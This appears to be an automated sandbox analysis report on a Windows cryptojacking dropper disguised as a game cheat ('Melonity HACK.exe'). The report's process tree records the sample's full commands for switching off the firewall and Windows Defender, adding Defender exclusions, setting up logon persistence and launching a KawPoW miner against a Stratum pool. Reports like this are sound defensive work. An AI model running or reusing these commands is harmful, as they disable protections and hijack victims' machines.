Analysis
max time kernel: 88s
max time network: 114s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 19-05-2022 20:02
Static task: static1
URLScan task: urlscan1
Malware Config
Signatures
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.

Downloads MZ/PE file

Executes dropped EXE (24 IoCs)

Modifies Windows Firewall (1 TTPs)

Processes:
- resource: behavioral1/memory/1120-221-0x0000000140000000-0x0000000141B39000-memory.dmp, yara_rule: vmprotect
- resource: behavioral1/memory/4856-228-0x0000000140000000-0x0000000141B39000-memory.dmp, yara_rule: vmprotect
- resource: behavioral1/memory/4856-227-0x0000000140000000-0x0000000141B39000-memory.dmp, yara_rule: vmprotect

Checks computer location settings (2 TTPs, 13 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (Start.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ac.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (Melonity HACK.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ab.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ac1.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ac1.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ab.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ac1.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (ac.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (WScript.exe)

AutoIT Executable (2 IoCs)
AutoIT scripts compiled to PE executables.
Processes:
- resource: C:\Users\Admin\Downloads\Melonity HACK.exe, yara_rule: autoit_exe
- resource: C:\Users\Admin\Downloads\Melonity HACK.exe, yara_rule: autoit_exe

Drops file in System32 directory (34 IoCs)
Processes:
- File created: C:\Windows\System32\GroupPolicy\User\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (u.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (WScript.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (u.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (reg.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (reg.exe)
- File created: C:\Windows\System32\GroupPolicy\User\Registry.pol (reg.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (WScript.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (reg.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (u.exe)
- File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (WScript.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (WScript.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\User\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (reg.exe)
- File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (u.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (u.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (u.exe)
- File opened for modification: C:\Windows\SysWOW64\GroupPolicy\gpt.ini (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (WScript.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy\GPT.INI (u.exe)
- File opened for modification: C:\Windows\System32\GroupPolicy (reg.exe)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 6 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Delays execution with timeout.exe (2 IoCs)

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)

Kills process with taskkill (18 IoCs)

Modifies registry class (6 IoCs)
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (Melonity HACK.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (cmd.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (ab.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (Melonity HACK.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (Melonity HACK.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (ab.exe)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (24 IoCs)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (18 IoCs)

Suspicious use of FindShellTrayWindow (44 IoCs)

Suspicious use of SendNotifyMessage (32 IoCs)

Suspicious use of WriteProcessMemory (64 IoCs)

Processes
- C:\Program Files\Google\Chrome\Application\chrome.exe
  Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://oxy.name/d/Jmxf
  Signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa05ec4f50,0x7ffa05ec4f60,0x7ffa05ec4f70
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:2
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3576 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6388 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6020 /prefetch:8
  - C:\Users\Admin\Downloads\Melonity HACK.exe
    Command: "C:\Users\Admin\Downloads\Melonity HACK.exe"
    Signatures: Executes dropped EXE; Checks computer location settings; Modifies registry class
    - C:\ProgramData\Defender\ab.exe
      Command: C:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
      Signatures: Executes dropped EXE; Checks computer location settings; Modifies registry class
      - C:\Windows\SysWOW64\WScript.exe
        Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"
    - C:\ProgramData\Defender\ac1.exe
      Command: C:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
      Signatures: Executes dropped EXE; Checks computer location settings
      - C:\ProgramData\Defender\u.exe
        Command: "C:\ProgramData\Defender\u.exe"
        Signatures: Executes dropped EXE; Drops file in System32 directory
    - C:\ProgramData\Defender\u.exe
      Command: "C:\ProgramData\Defender\u.exe"
    - C:\Windows\SysWOW64\WScript.exe
      Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"
      - C:\ProgramData\Defender\d.exe
        Command: "C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe
        Signatures: Executes dropped EXE
      - C:\Windows\SysWOW64\cmd.exe
        Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "
        - C:\Windows\SysWOW64\netsh.exe
          Command: NetSh Advfirewall set allprofiles state off
        - C:\Windows\SysWOW64\net.exe
          Command: net stop windefend
          - C:\Windows\SysWOW64\net1.exe
            Command: C:\Windows\system32\net1 stop windefend
        - C:\Windows\SysWOW64\reg.exe
          Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
        - C:\Windows\SysWOW64\reg.exe
          Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f
        - C:\Windows\SysWOW64\reg.exe
          Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        - C:\Windows\SysWOW64\reg.exe
          Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
        - C:\Windows\SysWOW64\reg.exe
          Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
        - C:\Windows\SysWOW64\schtasks.exe
          Command: SCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f
          Signatures: Creates scheduled task(s)
    - C:\ProgramData\Defender\ac.exe
      Command: C:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
      Signatures: Executes dropped EXE; Checks computer location settings
      - C:\ProgramData\Defender\min.exe
        Command: "C:\ProgramData\Defender\min.exe"
        Signatures: Executes dropped EXE
        - C:\ProgramData\Defender\Start.exe
          Command: C:\ProgramData\Defender\Start.exe
          Signatures: Executes dropped EXE; Checks computer location settings
          - C:\Windows\system32\cmd.exe
            Command: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A9A.tmp\9A9B.tmp\9A9C.bat C:\ProgramData\Defender\Start.exe"
            - C:\Windows\System32\Conhost.exe
              Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - C:\Windows\system32\timeout.exe
              Command: TIMEOUT /t 10
              Signatures: Delays execution with timeout.exe
            - C:\Windows\System32\WScript.exe
              Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"
              - C:\Windows\system32\cmd.exe
                Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "
                - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command: powershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps1
                  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ri0px40l\ri0px40l.cmdline"
                    Signatures: Executes dropped EXE
                    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA74.tmp" "c:\Users\Admin\AppData\Local\Temp\ri0px40l\CSCAB1027E5856E44C4BC98767FEC61198B.TMP"
                  - C:\Windows\System32\WScript.exe
                    Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"
                    - C:\Windows\system32\cmd.exe
                      Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Protection.exe"
                        Signatures: Kills process with taskkill
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Process.exe"
                        Signatures: Kills process with taskkill
                  - C:\Windows\System32\WScript.exe
                    Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"
                    - C:\ProgramData\Defender\Windows Protection.exe
                      Command: "C:\ProgramData\Defender\Windows Protection.exe"
                    - C:\ProgramData\Defender\Windows Process.exe
                      Command: "C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x
                  - C:\Windows\System32\WScript.exe
                    Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"
                    - C:\Windows\system32\cmd.exe
                      Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Protection.exe"
                        Signatures: Kills process with taskkill
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Process.exe"
                        Signatures: Kills process with taskkill
                  - C:\Windows\System32\WScript.exe
                    Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"
                    - C:\Windows\system32\cmd.exe
                      Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "
                      Signatures: Executes dropped EXE
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Protection.exe"
                        Signatures: Kills process with taskkill
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Process.exe"
                        Signatures: Kills process with taskkill
                  - C:\Windows\System32\WScript.exe
                    Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"
                    - C:\Windows\system32\cmd.exe
                      Command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "
                      - C:\Windows\system32\taskkill.exe
                        Command: taskkill /F /FI "imagename eq Windows Protection.exe"
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"10⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"11⤵
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x11⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
